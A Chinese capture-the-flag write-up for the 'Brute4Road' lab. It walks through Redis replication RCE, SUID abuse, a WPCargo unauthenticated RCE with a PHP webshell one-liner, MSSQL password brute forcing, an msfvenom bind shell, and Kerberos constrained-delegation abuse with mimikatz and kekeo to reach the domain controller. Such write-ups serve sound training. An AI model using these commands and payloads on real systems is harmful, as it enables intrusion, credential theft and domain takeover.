当前位置: 首页 > web >正文

春秋云镜 Brute4Road Writeup

web 2025/7/18 23:05:30

在这里插入图片描述

文章目录

  • 外网入口
  • 内网横向
  • 约束委派

外网入口

扫描端口发现开放了6379,探测发现是未授权 redis

在这里插入图片描述
在这里插入图片描述

redis 版本符合,直接打主从复制RCE:https://github.com/Ridter/redis-rce

python redis-rce.py -r x.x.x.x -L x.x.x.x -f exp.so

在这里插入图片描述

SUID提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

/usr/bin/base64有 suid 权限,利用base64读取到 flag01

在这里插入图片描述

内网横向

wget远程下载frpfscan工具,构建代理通道,内网信息收集

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.3      is alive
(icmp) Target 172.22.2.7      is alive
(icmp) Target 172.22.2.34     is alive
(icmp) Target 172.22.2.16     is alive
(icmp) Target 172.22.2.18     is alive
[*] Icmp alive hosts len is: 5
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.3:88 open
172.22.2.7:6379 open
172.22.2.16:1433 open
172.22.2.18:445 open
172.22.2.16:445 open
172.22.2.34:445 open
172.22.2.3:445 open
172.22.2.16:139 open
172.22.2.34:139 open
172.22.2.18:139 open
172.22.2.3:139 open
172.22.2.34:135 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.18:80 open
172.22.2.16:80 open
172.22.2.7:80 open
172.22.2.18:22 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo 
[*]172.22.2.34[->]CLIENT01[->]172.22.2.34
[*] NetInfo 
[*]172.22.2.3[->]DC[->]172.22.2.3
[*] NetInfo 
[*]172.22.2.16[->]MSSQLSERVER[->]172.22.2.16
[*] WebTitle http://172.22.2.16        code:404 len:315    title:Not Found
[*] OsInfo 172.22.2.3   (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.34     XIAORANG\CLIENT01             
[*] WebTitle http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS
[*] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02        
[*] NetBios 172.22.2.3      [+] DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.2.16  (Windows Server 2016 Datacenter 14393)
[+] ftp 172.22.2.7:21:anonymous [->]pub
[*] WebTitle http://172.22.2.18        code:200 len:57738  title:WordPress20/20
[*] ,: 12.821885828s

内网探测到一个WordPress

在这里插入图片描述

信息收集发现存在插件 WPCargo V 6.5.9

在这里插入图片描述

搜索漏洞发现:WPCargo < 6.9.0 - Unauthenticated RCE:https://github.com/biulove0x/CVE-2021-25003

python .\WpCargo.py -t http://172.22.2.18/
# 上传的webshell为:<?=$_GET[1]($_POST[2]);?>

在这里插入图片描述

上传个蚁剑webshell 连接

在这里插入图片描述

/var/www/html/wp-config.php找到数据库账号密码,传个adminer.php上去,本地登录数据库,找到 flag02

在这里插入图片描述

Fscan 扫描结果显示内网有个 MSSQLSERVER( 172.22.2.16 ),且开启1433端口,根据这里数据库的表的提示,把这些密码用作字典爆破 MSSQLSERVER

.\hydra.exe -l sa -P mssqlserver_pass.txt mssql://172.22.2.16

在这里插入图片描述

获取到账号密码之后,直接 MDUT 连接执行命令

在这里插入图片描述

先上线 MSF,该机器不出网,上正向

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=172.22.2.16 lport=777 -f exe -o shell_x64.exe

MDUT 先激活 Ole Automation Procedures 组件,然后上传shell_x64.exe,上线 MSF 之后直接 getsystem 提权

在这里插入图片描述

获得 flag03

在这里插入图片描述

约束委派

SharpHound 收集域内信息

在这里插入图片描述

在这里插入图片描述

MSSQLSERVER 被配置了 约束委派

查询约束委派主机

AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

在这里插入图片描述
使用 mimikatz 导出 MSSQLSERVER 票据

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

在这里插入图片描述
在这里插入图片描述

kekeo.exe 申请服务票据

kekeo.exe "tgs::s4u /tgt:[0;3e4]-2-1-40e10000-MSSQLSERVER$@krbtgt-XIAORANG.LAB.kirbi /user:Administrator@XIAORANG.LAB /service:cifs/DC.XIAORANG.LAB" "exit"

在这里插入图片描述
在这里插入图片描述

导入票据:

mimikatz.exe "kerberos::ptt TGS_Administrator@XIAORANG.LAB@XIAORANG.LAB_cifs~DC.XIAORANG.LAB@XIAORANG.LAB.kirbi" "exit"

在这里插入图片描述

在这里插入图片描述

http://www.xdnf.cn/news/9924.html

相关文章:

  • 互联网商业模式全景解读:B2B、B2C、C2C及更多
  • docker常见考点
  • Qt 中的 d-pointer 与 p-pointer小结
  • 每日一题——提取服务器物料型号并统计出现次数
  • Jupyter Notebook 是否需要与环境绑定
  • [C]基础17.自定义类型:结构体
  • [ctfshow web入门] web124
  • `qDebug`消息重定向到`QLabel`中。
  • 安卓手机照片在这个目录/storage/emulated/999/DCIM/Camera下的导出解决方案
  • 解决报错error: ‘void_t’ is not a member of ‘std’
  • Python reduce()函数详解:累积计算的艺术
  • 机器学习课设
  • 麒麟v10+信创x86处理器离线搭建k8s集群完整过程
  • 定点小数 不需要指数部分 不采用移码
  • ASP.NET TreeView控件使用指南
  • Java复习Day22
  • 前端使用qrcode来生成二维码的时候中间添加logo图标
  • Orcad 修复Pin Name重复问题
  • React 第五十节 Router 中useNavigationType的使用详细介绍
  • 【题解-洛谷】B4278 [蓝桥杯青少年组国赛 2023] 简单算术题
  • 飞牛NAS+Docker技术搭建个人博客站:公网远程部署实战指南
  • 【HTML-15】HTML表单:构建交互式网页的基石
  • 零基础开始的网工之路第十六天------Linux日志管理
  • VueScan Pro v9.8.45.08 一款图像扫描软件,中文绿色便携版
  • JSON Schema
  • javaweb 前言
  • ArcPy错误处理与调试技巧
  • 抖音、快手无水印福音开源下载器之蓝猫 BlueCatKoKo
  • MMdetection推理保存图片和预测标签脚本
  • 前端的面试笔记——Vue2/3(一)Vue2和Vue3的区别和优缺点